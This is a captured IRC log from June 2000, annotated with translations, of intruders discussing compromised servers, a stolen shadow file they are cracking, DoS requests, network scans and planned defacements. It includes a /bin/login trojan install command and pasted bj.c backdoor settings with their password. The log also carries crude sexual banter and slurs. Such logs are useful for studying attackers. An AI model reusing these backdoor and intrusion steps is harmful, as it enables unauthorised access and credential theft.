      :D1ck :kaos__ nick netb
      :D1ck :kaos___ bbiab
      :D1ck :kaos___ nick bbiab
      :D1ck :.save
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :d1ck you here?
      :D1ck :.join #7thsphere 
      :acidklown
      :txdcc01
      :txdcc01
      :txdcc01
      :txdcc01 Check it out
      :txdcc01
      :txdcc01
      :Gemru^wu
      :Sp07
      :Sp07
      :zmasterz
      :Gemru^wu
      :D1ck :.part #7thsphere 
      :D1ck :.part #7thsphere 
      :Sp07 :thats a lot of bots
      :Sp07 :heh
      :Sp07 :thats a lot of ping timeouts
      :Sp07 :hehe
      :D1ck :.part #7thsphere 
      
      -=-
      
      Day 09 June 12
      
      :Sp07 :wtf?
      :D1ck :dont know
      :Sp07 :G *kaos@211.46.* 960874933 Banned *kaos@211.46.*[60] until Tue Jun 13 06:38:24 2000 [960871104]: too many bots
      :Sp07 :G *kaos@195.231.251.* 960874857 Banned *kaos@195.231.251.*[1] until Tue Jun 13 06:37:08 2000 [960871028]: too many bots
      :Sp07 :thats fucking gay
      :D1ck :yure #7thsphere  freidns
      :D1ck :gling them?
      :ath0_
      :Sp07 :nope
      :Sp07 :it was me
      :Sp07 :
      :Sp07 :jk
      :D1ck :thanks gay
      :D1ck :
      :D1ck ::(
      :Sp07 :#eggdrops people isnt oping me =(
      :Sp07 :yo
      :D1ck :i`m making accounts on local isp 
      :D1ck :for freinds
      :D1ck ::(
      :D1ck :?
      :Sp07 :can you help me dos something?
      :Sp07 :192.168.13.233
      :D1ck :nope
      :D1ck :11 
      :D1ck :and i`m going to bed
      :D1ck :soryr
      :D1ck :sorry
      :D1ck ::)
      :D1ck ::)
      :J4n3 :errrrrrrr
      :D1ck :oye
      :J4n3 :where r all bawts ?
      :D1ck :i have the whole billing system
      :D1ck :glined
      :D1ck :i have the whole billing system of example
      :D1ck :oye
      :D1ck :heh
      :J4n3 :lol
      :J4n3 :glined how ?
      :J4n3 :they didn't have the same ip 
      :J4n3 :billing system of example ??
      :J4n3 :how ? 
      :D1ck :too many bots
      :D1ck :yep
      :D1ck :example ki file
      
      example's file
      
      :D1ck :oye J4n3 
      :D1ck :only elite freinds should get
      :D1ck :like j0e
      :D1ck :and rsnake
      :D1ck :coz then they all give it ot
      :D1ck ::P
      :J4n3 :yeah 
      :D1ck :and we can use it more
      :J4n3 :hmm like ?
      :D1ck ::P
      :J4n3 :lol rnsake
      :J4n3 :Rsnkae
      :D1ck :?
      :D1ck :?
      :D1ck :[root@K1dd13 billing]# ls
      :D1ck :add_hours.sh       monitor.sh~           usage_reporter.sh~
      :D1ck :add_hours.sh~      nms_monitor.sh~       user_bought_hours.sh
      :D1ck :add_user_hours.sh  sum.sh                user_usage_report.sh
      :D1ck :balance_hours.sh   temp.sh~              user_usage_report.sh.old.1
      :D1ck :check_user.sh      time_to_minutes.sh    user_usage_report.sh~
      :D1ck :create_users.sh    update_all_users.sh   user_used_hours.sh
      :D1ck :data               update_user_usage.sh  user_used_hours.sh~
      :D1ck :enabled.sh         usage_reporter.sh
      :D1ck :[root@K1dd13 bin]# ls
      :D1ck :a  delete_users.sh               m   r          set_bin_passwd_shell.sh
      :D1ck :c  get_first_line_and_delete.sh  ma  radius.sh  sync.sh
      :J4n3 :hehe
      :D1ck :[root@K1dd13 monitor_bin]# ls
      :J4n3 :kewl kewl
      :D1ck :monitor.sh  monitor.sh~  start_atrc_nms.sh  start_atrc_nms.sh~
      :J4n3 :oye where is passwd file ?
      :D1ck :[root@K1dd13 passwd_bin]# ls
      :D1ck :text_password_to_des.pl
      :D1ck :[root@K1dd13 passwd_bin]#
      :J4n3 :abay Account add kar na vip phir
      
      Hey why dont you add the VIP account?
      
      :D1ck :hehehe i did
      :J4n3 :oh ye phelay ka copy karliya tha /
      
      oh this has been copied from previous (stuff)
      
      :D1ck :it got deleted
      :J4n3 :oh :(
      :D1ck ::P
      :J4n3 :acha iska passwd file kaha hai ?
      
      Ok where is its passwd file?
      
      :D1ck :oye crack kar
      :D1ck :oye crack kar
      
      Yo crack it
      Yo crack it
      
      :J4n3 :lekin unshadow karna hoga na phir crack hoga
      
      But we will have to unshadow it before cracking it
      
      :D1ck :why do u want it?
      :D1ck :i gave u shadow
      :D1ck :with passwords
      :J4n3 :oh 
      :J4n3 :wait
      :D1ck :;p
      :J4n3 :oye only 126 passes on it ?
      :D1ck :nope
      :D1ck :5438 shadow
      :D1ck :5438
      :J4n3 :errr then why it showing 128 :/
      :D1ck :hehe dunno
      :D1ck ::P
      :J4n3 :nahin nahi sahi hai
      
      no no it is correct
      
      :J4n3 :may be its a error
      :D1ck :oh
      :J4n3 :coz speed is very slow of cracking
      :D1ck :oh
      :J4n3 :agar 126 hothay tho is waqth thak complete hojatha hehe
      
      if there were only 126, it would have completed by this time
      
      :J4n3 :its still on 0 %
      :D1ck :what?
      :D1ck :oh
      :J4n3 :D1ck ka bacha 
      :J4n3 :daal daal kacha
      
      [note: this guy is teasing D1ck - by some colloquial rhyme]
      
      :D1ck :heh
      :D1ck ::/
      :D1ck :koi isp bata
      
      give me some ISPs
      
      :D1ck :jis ko hax0r karo
      
      that we can hax0r
      
      :D1ck :?
      :D1ck :J4n3 
      :D1ck :a prson elite like u
      :D1ck :shouldnt hang in #karachi
      :D1ck ::P
      :D1ck :simple, straight karachi and #dleusion is full of lamers
      :D1ck :heh
      :D1ck :J4n3 
      :D1ck ::P
      :D1ck : /kick J4n3 
      :J4n3 :loool
      :D1ck :seriously ayar
      :D1ck :yaar
      
      yaar = pal
      
      :D1ck :+
      :D1ck :it's h1gh
      :D1ck :who sed so much about u
      :D1ck :./fuck backstabbers
      :D1ck :simple.
      :J4n3 :hahah abay i'm the admin there plus rob hai koi tho elitee hona chaiyee in lamerz main
      
      hahah... hey i am the admin there plus there's someone called "rob" who's wanting to become elite in lamerz main
      
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      
      plus my kiddiesssssssssssssss
      plus my kiddiesssssssssssssss
      plus my kiddiesssssssssssssss
      
      :D1ck ::P
      :D1ck :k
      :D1ck ::)
      :D1ck :oye today is 13th july?
      :D1ck :oye today is 13th junbe
      :D1ck :?
      :J4n3 :no
      :J4n3 :12
      :D1ck :oh
      :D1ck :gline 12th ko hatay ga
      
      gline will be removed on 12th
      
      :J4n3 :june
      :J4n3 :hmm
      :J4n3 :it meanz aaj raatjh ya kal
      
      it means either tonight or tomorrow
      
      :J4n3 :coz 
      :J4n3 :states main abi 11 haI
      
      because in the states (US) it is still 11
      
      :D1ck :shit
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :zeeshan_S
      :zeeshan_S
      :D1ck :k-rad- say KEWL
      :k-rad- :KEWL
      :D1ck :le say KEWL
      :le :KEWL
      :D1ck :hey J4n3 
      NICK pencil
      USER werd . . :DoS
      
      NOTICE AUTH :*** Looking up your hostname
      NOTICE AUTH :*** Checking Ident
      NOTICE AUTH :*** No ident response
      NOTICE AUTH :*** Found your hostname
      :graz.at.Eu.UnderNet.org 465 pencil : use another server.
      ERROR :Closing Link: pencil by graz.at.Eu.UnderNet.org (K-lined)
      NICK pencil
      USER werd . . :DoS
      :D1ck :i tried a login trojan
      :Sp07 :yah
      :D1ck : /bin/login
      :D1ck :when n i change it
      :D1ck :the admin cant acess the box?
      :D1ck :i was thinking this the other day
      :Sp07 :of course they can
      :D1ck :they admin cant access the box?
      :D1ck :no
      :Sp07 :what does the trojan do?
      :D1ck :i tried it
      :Sp07 :yes they can
      :Sp07 :depends on what the trojan does
      :D1ck :in my own box
      :Sp07 :like I use the bj trojan
      :D1ck :i cp -f login.trojan /bin/login
      :Sp07 :the admin will still be able to login
      :D1ck :no
      :D1ck :oh
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :#@$
      :Sp07 :I dont got it
      :Sp07 :hehe
      :Sp07 :hold on let me check for it somewhere
      :D1ck :#@$
      :D1ck :ok
      :Sp07 :I do have it
      :Sp07 :hehe
      :D1ck :PLEASE GET ME
      :D1ck ::)
      :Sp07 :you know how to use it right?
      :D1ck :welp
      :D1ck :may login trojans dont work
      :D1ck :i tried like 7-8
      :D1ck :and that sucks
      :D1ck :ofcourse
      :D1ck :TERM=pass
      :D1ck :telnet owned.com
      :D1ck :bash#
      :D1ck :uname -a;id
      :D1ck :root root root
      :D1ck :heh
      :Sp07 :make you change the pass for each box you own
      :Sp07 :make sure you change the pass for each box you own
      :Sp07 :accept
      :Sp07_ :accept it
      :Sp07_ :hurry I got to eat breakfast soon
      :D1ck :k
      :D1ck ::P
      :Sp07_ :umm
      :Sp07 :#define SHELL "/bin/sh"
      :Sp07 :#define SHELL_CALLME "login"
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :#define LOGIN_CALLME "login"
      :Sp07 :#define ENV_NAME "TERM"
      :Sp07 :#define ENV_VALUE "rh6ps0"
      :Sp07 :#define ENV_FIX "vt100"   
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :for that
      :Sp07 :you have to move the old login there
      :Sp07 :cp /bin/login /usr/bin/xcat
      :Sp07 :#define ENV_VALUE "rh6ps0"
      :Sp07 :and thats the password right there
      :D1ck :oh
      :Sp07 :change it for each box you own
      :D1ck :why?
      :D1ck :why?
      :Sp07 :cause someone can hack one of your boxes
      :Sp07 :and get the password
      :Sp07 :got to go eat
      :Sp07 :brb
      :D1ck :i have 100+
      :D1ck :i change for each box?
      :D1ck :nohup_ say hehe
      :Sp07 :fix my dick ho
      :D1ck :nohup  say heh
      :nohup :heh
      :D1ck :nohup userlist
      :Sp07 :nohup act suck Sp07 dick
      :Sp07 :do that
      :Sp07 :do that
      :Sp07 :do that
      :D1ck :nohup Sp07=/dev/null
      :D1ck :[nohup(dcc)] [23:39] (D1ck) linking Sp07 to /dev/null
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :nohup_
      :D1ck :nohup_ say hehe
      :D1ck :nohup___ say hehe
      :Sp07 :ADD DISEASE * DISEASE 10000000000
      :Sp07 :mwuahhaha
      :D1ck :hahaha
      :D1ck :i own u
      :desire
      :D1ck :nohup____ say heh
      :nohup_
      :nohup__
      :D1ck :nohup____ say hehee
      :D1ck :HPUX  say hi
      :D1ck :Sp07 
      :D1ck :what date is it in the us?
      :D1ck :12?
      :D1ck :
      :D1ck :13?
      :Sp07 :I dont know
      :Sp07 :hehe
      :D1ck :coz my glined will be off 
      :Sp07 :let me go check
      :D1ck :13
      :D1ck ::(
      :D1ck :no
      :D1ck :seriously
      :D1ck :?
      :Sp07 :12
      :D1ck :shit
      :D1ck :fuck
      :D1ck :FUCK GRID
      :D1ck :dosing
      :D1ck ::(
      :Sp07 :uh hu hu hu hu huh
      :Sp07 :shutup beavis
      :D1ck :man
      :D1ck :i want to own 45329543294093249-3954395495-9340593-95r34-95-2349959234-593-49534-95-4395-349542-93
      :D1ck ::P
      :D1ck :Sp07 
      :D1ck :ACTION fingers Sp07 
      :D1ck :ACTION fingers Sp07's pussy
      :D1ck :u are a girl Sp07 ?
      :D1ck :right?
      :Sp07 :NIO
      :Sp07 :NO
      :Sp07 :when I say suck my dick
      :Sp07 :what do you think I mean?
      :Sp07 :hehe
      :D1ck :HEH
      :D1ck :ehhe
      :D1ck :hehe
      :D1ck :i lost ns2.example.net
      :D1ck ::(
      :D1ck :coz of diz
      :D1ck :well
      :D1ck :he tried 32094-249-23 bad logins
      :Sp07 :=(
      :Sp07 :dont you run sniffers?
      :Sp07 :oh yea
      :Sp07 :its that 1
      :D1ck :i rooted it btw
      :D1ck :the BIG PALACE HUB
      :D1ck :FOR MORE TEN 32409182390408 CLIENTS
      
      [note: well I wonder who these guys are - that whole country must be in an outage
       because they don't have very many pipes going in and out of there]
      
      :D1ck :IT WAS A 15 MB PIPE
      :D1ck :well
      :Sp07 :A PIPE
      :D1ck :2000000 MB
      :Sp07 :2 gigabytes?
      :Sp07 :or wait
      :Sp07 :i cant count
      :Sp07 :hehe
      :D1ck :but man
      :Sp07 :too blurry
      :D1ck :it was fast
      :Sp07 :uh huh
      :Sp07 :he owned you?
      :D1ck :no
      :D1ck :h4r33 and own me
      :D1ck :hehe
      :D1ck :diz == script kids
      :D1ck :diz == script kid
      :D1ck :he cant even code
      :D1ck :or read shell codes
      :D1ck :if i send him a trojan
      :Sp07 :hahaha
      :Sp07 :he will use it?
      :D1ck :shell code directed to 127.0.0.1
      :D1ck :he will use it
      :D1ck :hahaha
      :Sp07 :just like you used my bj.c
      :Sp07 :and now I owned you
      :Sp07 :hahahha
      :Sp07 :j/k
      :Sp07 : =)
      :Sp07 :?
      :Sp07 :what happened?
      :D1ck__
      :D1ck :what was my quit?
      :D1ck :what was my quit?
      :Sp07 :didnt you see it?
      :Sp07 :hahaha
      :Sp07 :you came in
      :Sp07 :[09:52] *** D1ck__ (~dynamic@orff.example.net) has joined 
      :Sp07 :[09:52] *** inetd-s sets mode: +o D1ck__
      :Sp07 :[09:52] <Sp07> ?
      :Sp07 :[09:52] *** D1ck has quit IRC (Read error to D1ck[orff.example.net]: Connection reset by peer)
      :D1ck :what was my quit?
      :D1ck :what was my quit?
      :D1ck :oh
      :D1ck : SignOff D1ck: #botsex,#lecole,#Linuxsex,&partyline (Read error to
      :D1ck :          D1ck[orff.example.net]: Connection reset by peer)
      :Sp07 :hahahahahaha
      :Sp07 :=D
      :D1ck ::)
      :D1ck :did u hack me
      :D1ck :and killall -9 BitchX?
      :D1ck ::(
      :D1ck :Sp07 HACKE DME
      :D1ck :ME
      :D1ck :i am scanning 216.55
      :Sp07 :?
      :Sp07 :did you see what I said before you quit?
      :D1ck
      :D1ck :nope
      :D1ck :what did u sya?
      :Sp07 :[09:50] <Sp07> just like you used my bj.c
      :Sp07 :[09:50] <Sp07> and now I owned you
      :Sp07 :[09:50] <Sp07> hahahha
      :Sp07 :[09:50] <Sp07> j/k
      :Sp07 :[09:50] <Sp07>  =)
      :D1ck :oh
      :D1ck :yep
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> just like you used my bj.c
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> and now I owned you
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> hahahha
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> j/k
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07>  =)
      :D1ck :hehehe
      :D1ck :IRIX say heh
      :IRIX :heh
      :Sp07 :did yo hack irix?
      :D1ck :no
      :D1ck :its a bot
      :D1ck :from redhat
      :Sp07 :hehehe
      :D1ck :=P
      :D1ck :dude
      :D1ck :if u give me lodgic
      :D1ck :of finding IRIX
      :D1ck :i`ll make my own scanner
      :D1ck :but
      :D1ck :i need some sort of a hint
      :D1ck :i never used IRIX before, except for once
      :Sp07 :if I give you what?
      :D1ck :hint
      :Sp07 :hint?
      :D1ck :heh
      :D1ck :never mind
      :D1ck :let me check my jp.log
      
      [note: jp.log seems to be a list of hosts from Japan, xx.log where xx is a TLD]
      
      :D1ck :heh
      :D1ck :in couple of weeks
      :Sp07 :ok
      :D1ck :unet will gline
      :D1ck :*
      :D1ck :and
      :D1ck :*
      :D1ck :ll
      :D1ck :lol
      :Sp07 :heh
      :D1ck :=P
      :D1ck :i`ll make a script ./script roots.txt
      :D1ck :it will check bj on all boxes
      :D1ck :if true
      :D1ck :then it will keep if not it will grep -v
      :D1ck :it will be easier
      :D1ck :hehe
      :Sp07 :umm
      :Sp07 :whats the point if you dont know the bj password?
      :Sp07 :hehe
      :D1ck :i know
      :D1ck :its my bj
      :D1ck ::P
      :Sp07 :oh
      :D1ck :<syntax3> like i`d sugest,a admin should always find .kr* .jp.log, coz hackers uslly scan that, and it's quite possible that if u find such log u are vuln.
      :D1ck :THATS LAME
      :D1ck :i just got that from my quotes.txt
      :D1ck :Sp07 
      :D1ck :u have CERT KEY
      :D1ck :?
      :Sp07 :cert key ?
      :Sp07 :for what?
      :Sp07 :anyways no
      :Sp07 :eheh
      :Sp07 :I dont have anything 
      :Sp07 :only thing I have is my pride
      :D1ck :lol
      :D1ck :m4d 3l337 tr0j4n by d1ck
      :Sp07 :change your bj password
      :Sp07 :for each shell
      :D1ck :why?
      :Sp07 :cause if 1 of your shells get hacked
      :D1ck :its easy to sniff
      :D1ck :?
      :Sp07 :people can find out the bj password
      :Sp07 :no
      :Sp07 :people can hack your shell and find out your password
      :D1ck :how?
      :D1ck :TERM
      :D1ck :TERM????
      :D1ck :HOW
      :D1ck :?
      :Sp07 :uhh
      :Sp07 :just view /bin/login
      :Sp07 :let me on your shell
      :Sp07 :and I will find out your password
      :Sp07 :hehe
      :D1ck :hehe
      :D1ck :oh
      :D1ck :the codder sux
      :D1ck :he should have crypted it
      :D1ck :so no hex editors could read it
      :Sp07 :type 
      :Sp07 :more /bin/login
      :Sp07 :and look throught it
      :Sp07 :and you will se your password
      :Sp07 :like TERM=
      :Sp07 :password
      :Sp07 :or something
      :D1ck :oh
      :D1ck :kewl
      :D1ck :******** /bin/login: Not a text file ********
      :Sp07 :?
      :D1ck :with more u cant view binaries
      :D1ck ::P
      :Sp07 :yes you can
      :D1ck :no
      :Sp07 :# more /bin/login
      :Sp07 :ELF     (4]4 (44sstt</usr/lib/ld.so.15
      :Sp07 :@(6 %4<&*/;,?9:1-'378#"5>2
      :Sp07 :)0$.=<\h       (       
      :Sp07 :, $,4   ($PH:t^LP
      :Sp07 :V\]hbiq(w  }
      :Sp07 :--More--(5%)  
      :Sp07 :hehe
      :D1ck :heh
      :Sp07 :its in there
      :Sp07 :in all that junk
      :D1ck :i cant
      :Sp07 :on that shell you cant
      :Sp07 :cause its gay
      :Sp07 :hehe
      :D1ck :cat 
      :D1ck :?
      :Sp07 :yeah
      :D1ck :hehe
      :D1ck :k
      :Sp07 :you can use cat
      :Sp07 :cat /bin/login | more
      :Sp07 :do that
      :Sp07 :heeh
      :D1ck :k
      :D1ck :whats TERMTYPE for ansi?
      :D1ck :i forgot
      :D1ck :vt100
      :D1ck :is normal
      :D1ck :ani
      :D1ck :??
      :Sp07 :?
      :Sp07 :vt100
      
      -=-
      
      Day 10 June 13
      
      :D1ck :noo
      :D1ck :hrm
      :Sp07 :i dont know
      :Sp07 :vt200?
      :Sp07 :vt102
      :Sp07 :ansi
      :Sp07 :type in ansi
      :D1ck :hrm
      :Sp07 :for termtype
      :Sp07 :ehhe
      :D1ck :hehe
      :D1ck :w00p u leaked my pass
      :D1ck ::P
      :Sp07 :?
      :D1ck :j/k
      :Sp07 :let me on your shell
      :Sp07 :I will find your pass
      :D1ck :it's ok
      :D1ck ::)
      :D1ck :jp is leet
      :D1ck :un ownable
      :Sp07 :japane?
      :D1ck :yeah
      :D1ck :hehe
      :D1ck :hry
      :D1ck :hey
      :D1ck :i owned one
      :D1ck :kekekke
      :D1ck :ACTION suspects Sp07  is a fed
      :D1ck :well
      :D1ck :can a fed bust me?
      :D1ck :no
      :D1ck :?
      :D1ck :bbl
      :D1ck :sleep
      :D1ck :10 in morning here
      :D1ck :sleeps
      :D1ck ::)
      :D1ck :ACTION is away: (sleep) [BX-MsgLog On]
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :kaos_ nick rhtc
      :D1ck :nohup_ nick industrial
      :D1ck :J4n3 
      :D1ck :ACTION is away: (sleeps) [BX-MsgLog On]
      :Sp07 :you got any legit shells?
      :D1ck :nope
      :D1ck :CHAO
      :D1ck :sleeping
      :J4n3
      :J4n3
      :D1ck :nohup_ nick PHAT
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :nohup_ nick PHAT6
      :Sp07 :phat6 nick dicksuck
      :m4ry :sigh
      :m4ry :LOG THIS
      :dinto :hey d1ck
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :dinto :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :.join #
      :D1ck :.part
      :D1ckhack :.join #k1dd13 cafe2
      :D1ckhack :.join #k1dd13 cafe2
      :D1ckhack :.join #k1dd13 
      :D1ckhack :.part
      :D1ck :dos save
      :Sp07 :
      :D1ck :?
      :Sp07 :@
      :bitch :ho
      :h4r33 :take over
      :D1ck :(h4r33/
      :D1ck :host-l: No such nick
      :D1ck :h4r33: No such nick
      :D1ck : Signon by h4r33
      :D1ck :(h4r33/
      :D1ck :host-l: No such nick
      :D1ck :h4r33: No such nick
      :D1ck :wtf
      :D1ck :?
      :Sp07 :hehehe
      :Sp07 :#k1dd13 = -n
      :D1ck :ph3w
      :Sp07 :gwwgww
      :Sp07 :gheheh
      :Sp07 :ehe
      :Sp07 :he
      :D1ck :hey
      :D1ck :check if kaos@211.46
      :D1ck :is klined
      :D1ck :from atlatna
      :D1ck :and
      :D1ck :stuff
      :D1ck :?
      :Sp07 :nope
      :Sp07 :dont think it is
      :D1ck :why arnt the bots up?
      :D1ck :all running ./mech
      :D1ck :i checked
      :Sp07 :dunno
      :Sp07 :there was some bug
      :Sp07 :on some emech versino
      :Sp07 :where it wouldnt reconnect to servers
      :Sp07 :but that was long ago
      :Sp07 :when I used to use emechs
      :D1ck :no
      :D1ck :i have the new one
      :HPUX :EnergyMech 2.7.6u1
      :D1ck :lol
      :D1ck :man
      :D1ck :u ever owned nxt?
      :Sp07 :thats not that new I think
      :D1ck :err bind
      :D1ck :?
      :Sp07 :nope
      :D1ck :?
      :D1ck :coz like
      :D1ck :?
      :Sp07 :you asked me that yesterdya
      :D1ck :oh
      :D1ck :oh
      :D1ck :no i dint
      :Sp07 :yes you did
      :Sp07 :
      :Sp07 :@@@@@@@
      :Sp07 :#########
      :Sp07 :$$$$$$$$
      :Sp07 :%
      :D1ck :OH
      :D1ck :well
      :D1ck :NO
      :D1ck :I DINT@
      :Sp07 :$$$$$$$$$$
      :Sp07 :##########
      :Sp07 :YYYYYYYYY
      :Sp07 :EEEEEEE
      :Sp07 :SSSSSSSS
      :Sp07 : DSFFFFF
      :D1ck :man
      :D1ck :my freind is 16 
      :D1ck :and she is a mother
      :D1ck ::()
      :Sp07 :so?
      :D1ck :15
      :Sp07 :hehe
      :D1ck :15
      :Sp07 :at my school there are lots of pregnant girls there
      :Sp07 :I go to continuation high school
      :D1ck :heh
      :D1ck :HAHAHAHAHHAAH
      :Sp07 :babies there
      :Sp07 :lots
      :Sp07 :hehe
      :Sp07 :like 1/4 of the girls are either pregnant or have babies
      :D1ck :LOL
      :Sp07 :my school has like 100 studenst in it
      :D1ck :HAHAHAHAHA
      :D1ck :kewl
      :D1ck :babies?
      :D1ck :they dont abort?
      :D1ck :abortion = brutal
      :Sp07 :nope
      :D1ck :kewl
      :D1ck :u saw a 13 year old pregnent girl ever?
      :Sp07 :nope
      :D1ck :k
      :Sp07 :yo yo yo yoyo yooyyoyoyoyoyoyyoyoyoyoyoooooooooooyyyyyyyooooooooyyooooyoyoyoyyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyo
      :Sp07 :you should start eggdrop net
      :Sp07 :instead of mechs
      :Sp07 :eggdrops are better
      :D1ck :well
      :Sp07 :yOOYOYYOoyoOYOYOYOyOYOOYOYoyyoyoyoYOOyoYOyoOYOYOYOYOyooyOYOyoYoYO
      :Sp07 :WASupSUPUpsUWpASUPWUSpwuAPSUpsu
      :D1ck :may eb
      :Sp07 :maybe?
      :Sp07 :dick
      :Sp07 :ass
      :Sp07 :fuck
      :Sp07 :vbbbbbbbbbbujh
      :Sp07 :uk
      :Sp07 :I AM BORED AS FUCK
      :Sp07 :FUCK FUCK FUCK
      :Sp07 :IS IT 12:00 IN PAKISTAN?
      :Sp07 :03.............................................2111111111111111111564987654144444444++++++++++-*****///////-*/81*0.-+*/801
      :Sp07 :+950+950974**-77055555121654
      :D1ck :yep
      :D1ck :exactly 12
      :D1ck :night
      :Sp07 :seeeee
      :D1ck ::P
      :Sp07 :how
      :Sp07 :smart
      :Sp07 :I
      :Sp07 :am
      :Sp07 :time to play some starcraft
      :Sp07 :afk
      :D1ck :haha
      :D1ck :k
      :Sp07 :while im playing
      :Sp07 :starcraft
      :Sp07 :I
      :Sp07 :want you to
      :Sp07 :change all your 
      :Sp07 :mechs
      :Sp07 :to eggdrops
      :Sp07 :ok
      :Sp07 :?
      :Sp07 :?
      :D1ck :well
      :Sp07 :your too lazy too
      :Sp07 :
      :D1ck :i`ll think about it.
      :Sp07 :haheha
      :Sp07 :ill give you tcls to use
      :D1ck :;P
      :D1ck :k
      :Sp07 :29-2-2
      :Sp07 :thats my score
      :Sp07 :5-2-2
      :Sp07 :is my ladder score
      :Sp07 :tahts how good I am
      :D1ck :k
      :J4n3 :chayeen chapa chayeen chapa kay chayeen, paaniyon main cheentay uraathee huwee larkee
      :J4n3 :dekheeeeee hai humnain aathi huwee lehron say jaathi huwee larkeeee
      :D1ck :ins
      :D1ck :J4n3 
      :D1ck :i`m trying to own example.com
      :D1ck :and bollywodpages
      :J4n3 :thats kewl D1ck
      :J4n3 :defacing will be popular :p
      :Sp07 :go hack me a bounce d1ck
      :Sp07 :fast 1
      :m4ry :w3rd
      :m4ry :what happened to the other bots?
      :J4n3 :m4ry sup ?
      :J4n3 :bots glined i think
      :D1ck :HEH
      :m4ry :hey J4n3
      :D1ck :HEATAZ
      :m4ry :again? ;)
      :D1ck :8.2
      :D1ck :?
      :J4n3 :heh
      :m4ry :SN1P3R
      :D1ck ::)
      :D1ck :SUp
      :D1ck :?
      :m4ry :8.2?
      :m4ry :scan wol already
      :D1ck :yeah
      :m4ry :i'm stuck here with my roots going up/down
      :m4ry :24/7
      :D1ck :no
      :D1ck :tell me
      :m4ry :can't tell if it's my end that's down or theirs
      :m4ry :./nmap -sP -PI wol.net.pk/24
      :m4ry ::)
      :D1ck :hahahaha
      :D1ck :ROFL
      :D1ck :m4ry
      :D1ck :tell me
      :D1ck :?
      :D1ck :when i query
      :D1ck :it goes through
      :D1ck :and dont sow on my NS 
      :D1ck :dig @www.example.com dick.snip.example.net a
      :D1ck :i tried
      :D1ck :IN NXT
      :m4ry :dig IN A @blah www.haha.heatz.snip.example.net
      :D1ck :??????
      :m4ry :or
      :m4ry :dig IN NXT @blah www.haha.heatz.snip.example.net
      :m4ry :same thing
      :m4ry :make subdomains of subdomains
      :m4ry :and keep making different ones
      :m4ry :cos sometimes the DNS records get cached
      :D1ck :www?
      :D1ck :subdomain is snip.example.net
      :D1ck :subdomain is snip.example.net
      :D1ck :oh
      :D1ck :i do
      :m4ry :ur authorative over sovg.net?
      :m4ry :or whatever
      :m4ry :WOL is l33t
      :m4ry :they run BSDI
      :m4ry :most others here run NT
      :m4ry :[root@localhost /root]# dig @radius.wol.net.pk version.bind chaos txt  
      :m4ry :VERSION.BIND.           0S CHAOS TXT    "4.9.7-REL"  
      :m4ry :LOL
      :D1ck :yep
      :D1ck :socg
      :D1ck :man
      :D1ck :U GOT LINUX
      :D1ck :?
      :D1ck :U GOT LINUX?????????
      :D1ck :U GOT LINUX?????????
      :D1ck :U GOT LINUX?????????
      :m4ry :ur lagging
      :m4ry :are u mad
      :D1ck :HEATAZ
      :D1ck :U I KHI?
      :m4ry :i'm sitting in this shithole of a city
      :D1ck :and u got LINUX
      :D1ck :HAW
      :m4ry :with no healthy computer for miles
      :D1ck :?
      :D1ck :?
      :D1ck :hahahaha
      :D1ck :well
      :D1ck :nxt is starting to suck
      :D1ck ::)
      :m4ry :i'm getting some flak here
      :m4ry :nxt?
      :m4ry :why?
      :m4ry :works 99% of the time for me :)
      :m4ry :SCAN WOL
      :m4ry :CLASS B
      :m4ry :WOL.NET.PK
      :m4ry :FOR NAMED & BSD SHIT
      :m4ry :i'm out
      :m4ry :my cuz is out of hours (again)
      :m4ry :i am indeed, cut-off
      :m4ry :LOL
      :D1ck :heh
      :D1ck :no bots?
      :D1ck ::(
      :D1ck :'flak'?
      :D1ck :heh
      :D1ck :i cant own www.example.com
      :D1ck :haha this freind's quit message
      :D1ck :rofl
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :J4n3 
      :D1ck :mera babies
      :Sp07 :my script is elite now
      :Sp07 :hahaah
      :D1ck :hahaha
      :Sp07 :after I get like 10 more bots
      :Sp07 :and like
      :D1ck :i am a cool member of diz-crew
      :D1ck :HAHAHA
      :Sp07 :finish the script
      :D1ck :founded by h4r33
      :D1ck :./ == welcome
      :Sp07 :Co0l
      :Sp07 :./
      :D1ck ::)
      :Sp07 :./
      :Sp07 :./
      :D1ck :HHEH
      :Sp07 :./Sn1p3R
      :D1ck :./HEH h4r33
      :Sp07 :./DiSeasE
      :D1ck :rofl
      :D1ck :;)
      :Sp07 :./SpITz
      :Sp07 :./PhAT6
      :D1ck :anyway
      :D1ck :~
      :D1ck :
      :D1ck :
